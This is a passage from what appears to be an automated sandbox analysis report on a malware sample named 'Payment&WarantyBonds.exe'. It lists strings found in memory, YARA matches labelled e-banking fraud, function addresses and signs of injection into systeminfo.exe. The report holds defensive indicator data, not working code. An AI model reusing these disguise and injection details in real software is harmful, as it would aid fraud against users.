                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005F96000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000003846000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
                Source: lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002D48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=cotti.club

                E-Banking Fraud

                Source: Yara match, File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample, Static PE information: Filename: Payment&WarantyBonds.exe
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018ACD1F2_2_018ACD1F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0CB52_2_018B0CB5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800CF22_2_01800CF2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810C002_2_01810C00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188EFA02_2_0188EFA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01802FC82_2_01802FC8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01852F282_2_01852F28
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01830F302_2_01830F30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B2F302_2_018B2F30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01884F402_2_01884F40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01822E902_2_01822E90
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CCE932_2_018CCE93
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CEEDB2_2_018CEEDB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CEE262_2_018CEE26
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810E592_2_01810E59
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FF1722_2_017FF172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181B1B02_2_0181B1B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018DB16B2_2_018DB16B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184516C2_2_0184516C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018170C02_2_018170C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BF0CC2_2_018BF0CC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C70E92_2_018C70E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CF0E02_2_018CF0E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0185739A2_2_0185739A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FD34C2_2_017FD34C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C132D2_2_018C132D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018152A02_2_018152A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182B2C02_2_0182B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B12ED2_2_018B12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182D2F02_2_0182D2F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AD5B02_2_018AD5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D95C32_2_018D95C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C75712_2_018C7571
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CF43F2_2_018CF43F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018014602_2_01801460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CF7B02_2_018CF7B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C16CC2_2_018C16CC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018556302_2_01855630
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A59102_2_018A5910
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018199502_2_01819950
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182B9502_2_0182B950
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018138E02_2_018138E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187D8002_2_0187D800
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182FB802_2_0182FB80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01885BF02_2_01885BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184DBF92_2_0184DBF9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFB762_2_018CFB76
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01855AA02_2_01855AA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018ADAAC2_2_018ADAAC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B1AA32_2_018B1AA3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BDAC62_2_018BDAC6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFA492_2_018CFA49
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C7A462_2_018C7A46
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01883A6C2_2_01883A6C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182FDC02_2_0182FDC0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01813D402_2_01813D40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C1D5A2_2_018C1D5A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C7D732_2_018C7D73
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFCF22_2_018CFCF2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01889C322_2_01889C32
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01811F922_2_01811F92
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFFB12_2_018CFFB1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFF092_2_018CFF09
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017D3FD52_2_017D3FD5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017D3FD22_2_017D3FD2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01819EB02_2_01819EB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A24467_2_047A2446
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047944207_2_04794420
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0479E4F67_2_0479E4F6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F05357_2_046F0535
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B05917_2_047B0591
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470C6E07_2_0470C6E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F07707_2_046F0770
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047147507_2_04714750
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046EC7C07_2_046EC7C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047820007_2_04782000
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047781587_2_04778158
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478A1187_2_0478A118
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046E01007_2_046E0100
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A81CC7_2_047A81CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B01AA7_2_047B01AA
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A41A27_2_047A41A2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047902747_2_04790274
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047702C07_2_047702C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AA3527_2_047AA352
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B03E67_2_047B03E6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046FE3F07_2_046FE3F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F0C007_2_046F0C00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046E0CF27_2_046E0CF2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04790CB57_2_04790CB5
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478CD1F7_2_0478CD1F
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046FAD007_2_046FAD00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046EADE07_2_046EADE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04708DBF7_2_04708DBF
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F0E597_2_046F0E59
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AEE267_2_047AEE26
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AEEDB7_2_047AEEDB
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04702E907_2_04702E90
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047ACE937_2_047ACE93
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04764F407_2_04764F40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04710F307_2_04710F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04792F307_2_04792F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04732F287_2_04732F28
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046E2FC87_2_046E2FC8
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0476EFA07_2_0476EFA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F28407_2_046F2840
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046FA8407_2_046FA840
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0471E8F07_2_0471E8F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046D68B87_2_046D68B8
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047069627_2_04706962
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F29A07_2_046F29A0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047BA9A67_2_047BA9A6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046EEA807_2_046EEA80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AAB407_2_047AAB40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A6BD77_2_047A6BD7
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046E14607_2_046E1460
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AF43F7_2_047AF43F
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A75717_2_047A7571
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B95C37_2_047B95C3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478D5B07_2_0478D5B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047356307_2_04735630
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A16CC7_2_047A16CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AF7B07_2_047AF7B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A70E97_2_047A70E9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AF0E07_2_047AF0E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F70C07_2_046F70C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0479F0CC7_2_0479F0CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047BB16B7_2_047BB16B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0472516C7_2_0472516C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046DF1727_2_046DF172
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046FB1B07_2_046FB1B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470D2F07_2_0470D2F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047912ED7_2_047912ED
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470B2C07_2_0470B2C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F52A07_2_046F52A0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046DD34C7_2_046DD34C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A132D7_2_047A132D
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0473739A7_2_0473739A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04769C327_2_04769C32
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFCF27_2_047AFCF2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A7D737_2_047A7D73
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A1D5A7_2_047A1D5A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F3D407_2_046F3D40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470FDC07_2_0470FDC0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F9EB07_2_046F9EB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFF097_2_047AFF09
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046B3FD27_2_046B3FD2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046B3FD57_2_046B3FD5
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFFB17_2_047AFFB1
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F1F927_2_046F1F92
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0475D8007_2_0475D800
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F38E07_2_046F38E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470B9507_2_0470B950
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F99507_2_046F9950
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047859107_2_04785910
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04763A6C7_2_04763A6C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFA497_2_047AFA49
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A7A467_2_047A7A46
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0479DAC67_2_0479DAC6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04735AA07_2_04735AA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478DAAC7_2_0478DAAC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04791AA37_2_04791AA3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFB767_2_047AFB76
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04765BF07_2_04765BF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0472DBF97_2_0472DBF9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470FB807_2_0470FB80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C1CA07_2_005C1CA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005BCBF77_2_005BCBF7
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005BCC007_2_005BCC00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005BCE207_2_005BCE20
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005BAEA07_2_005BAEA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C53007_2_005C5300
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C34F97_2_005C34F9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C35407_2_005C3540
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C353B7_2_005C353B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005DB8D07_2_005DB8D0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04A0E73C7_2_04A0E73C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04A0E2847_2_04A0E284
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04A0E3A37_2_04A0E3A3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04A0D8087_2_04A0D808
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 0188F290 appears 103 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 01857E54 appears 107 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 017FB970 appears 262 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 0187EA12 appears 86 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 01845130 appears 58 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04737E54 appears 107 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 0475EA12 appears 86 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 0476F290 appears 103 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 046DB970 appears 262 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04725130 appears 58 times
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1715237446.00000000007BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1724504317.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000000.1655164569.000000000027C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.00000000013A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000018FD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe Binary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment&WarantyBonds.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
